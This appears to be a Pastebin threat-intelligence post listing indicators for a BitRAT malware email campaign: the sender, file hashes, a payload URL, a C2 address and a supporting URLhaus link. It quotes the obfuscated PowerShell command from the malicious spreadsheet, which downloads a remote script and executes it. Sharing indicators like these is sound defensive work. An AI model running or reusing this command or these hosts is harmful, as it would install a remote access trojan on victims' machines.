Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT ATTRIBUTION: BITRAT
- SUBJECTS OBSERVED
- Re: Payment copy attached for SOA
- SENDERS OBSERVED
- Anthony Reves <info@trockenbau-buechler.de>
- DOCUMENT FILE HASHES
- Scanned_25526662-Payment.xls
- cd7d4543958945e3fab4f0631e3494f3
- Sparc.jpg (This is a PowerShell script)
- a8f7e8a8a64608d0493a660d93adff1c
- PAYLOAD FILE HASHES
- Test3.jpg
- 19387b30d6dbe83e31d3cac884280d93
- POWERSHELL FROM MALDOC
- cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
- BITRAT PAYLOAD DISTRIBUTION URLS FROM POWERSHELL/VB
- http://lankarecipes.com/Sparc.jpg
- BITRAT C2
- 45.15.143.216:5210
- SUPPORTING EVIDENCE
- https://urlhaus.abuse.ch/url/950978/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement